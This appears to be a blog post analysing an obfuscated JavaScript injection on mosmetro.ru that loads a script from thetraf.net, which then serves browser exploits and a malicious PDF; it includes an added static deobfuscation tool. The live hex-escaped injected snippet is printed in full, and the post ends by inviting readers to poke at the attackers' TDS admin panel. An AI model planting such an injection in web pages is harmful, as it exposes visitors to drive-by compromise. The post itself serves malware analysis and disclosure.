Open the source code of any page on mosmetro.ru and, right at the beginning, you will see an injected piece of JavaScript:
Looking at the last line of that ill-fated file:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);
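The snippet above is a textbook string-array obfuscation: every character of both strings is hex-escaped, and the only real statement is the `document[...](...)` call at the end. An analyst does not need to run it to learn what it does. The following is an added example, not code from the original post: it statically decodes the string array, resolves the `document[_0xd5c2[1]](_0xd5c2[0])` call into its plain-text method and argument, and lists the external script URLs that the call would have written into the page. The function names (`unescapeJsString`, `extractStringArray`, `resolveDocumentCalls`, `extractScriptSources`, `decodeInjection`) are the example's own; the input is the injected line quoted above.

```javascript
// Added example (not from the original post): statically decode the
// hex-escaped string array in the injected snippet and resolve the
// document[...] call without executing anything in a browser.
// INJECTED is the exact line quoted in the post.
const INJECTED = String.raw`var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);`;

// Decode JavaScript string-literal escapes (\xHH, \uHHHH and the usual
// single-character escapes) by hand, so eval() is never involved.
function unescapeJsString(literal) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", "0": "\0",
                   '"': '"', "'": "'", "\\": "\\", "/": "/" };
  return literal.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (m, esc) => {
    if (esc[0] === "x" || esc[0] === "u") {
      return String.fromCharCode(parseInt(esc.slice(1), 16));
    }
    return esc in simple ? simple[esc] : esc;
  });
}

// Locate the obfuscation array `var _0x....=["...","..."];` and return its
// name plus the decoded strings, or null when the pattern is absent.
function extractStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) return null;
  const strings = [];
  const lit = /"((?:[^"\\]|\\.)*)"/g;
  let s;
  while ((s = lit.exec(m[2])) !== null) strings.push(unescapeJsString(s[1]));
  return { name: m[1], strings };
}

// Resolve every document[<name>[i]](<name>[j]) call into plain text.
function resolveDocumentCalls(src, name, strings) {
  const esc = name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(`document\\[${esc}\\[(\\d+)\\]\\]\\(${esc}\\[(\\d+)\\]\\)`, "g");
  const calls = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    calls.push({ method: strings[Number(m[1])], argument: strings[Number(m[2])] });
  }
  return calls;
}

// Pull every <script src="..."> out of HTML that would have been written.
function extractScriptSources(html) {
  const out = [];
  const re = /<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Full pipeline: decode the array, resolve the call, list external loads.
// These URLs are the indicators worth blocking and hunting for in proxy logs.
function decodeInjection(src) {
  const arr = extractStringArray(src);
  if (!arr) return { arrayName: null, strings: [], calls: [], externalScripts: [] };
  const calls = resolveDocumentCalls(src, arr.name, arr.strings);
  const externalScripts = calls
    .filter((c) => c.method === "write")
    .flatMap((c) => extractScriptSources(c.argument));
  return { arrayName: arr.name, strings: arr.strings, calls, externalScripts };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(decodeInjection(INJECTED), null, 2));
}
```

Running it on the quoted line resolves the call to `document.write('<script src="http://thetraf.net/tds/in.cgi?default"></script>')`, which is the external loader the next paragraph refers to; the same decoder works on any injection that follows the `var _0x...=[...]` pattern, which is why the array name is matched generically rather than hard-coded.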
After this section executes on the page, one more script is added, this time loaded from an external link:
After several redirects, it serves the browser a JavaScript exploit suited to that browser, relying on one or another currently unpatched vulnerability. Under Opera for Windows, for example, a malicious PDF file opens spontaneously, even though integration of the Adobe Reader PDF viewer with the browser is disabled.
For those wishing to delve into the code, here is a sample of the JS code and a sample of the PDF document. Kaspersky Anti-Virus detects the resulting PDF as Exploit.Win32.Pidief.cyk. The rest of the antivirus products stay almost entirely silent: VirusTotal report.
According to DomainTools and WebHosting.info, several more domains are attached to this host (located, of course, in China), presumably for similar purposes.
P.S. By the way, at thetraf.net/tds/admin there is a password-protected entrance to the Sutra TDS admin panel (TDS: traffic distribution system), if anyone can pull out any details from there. :)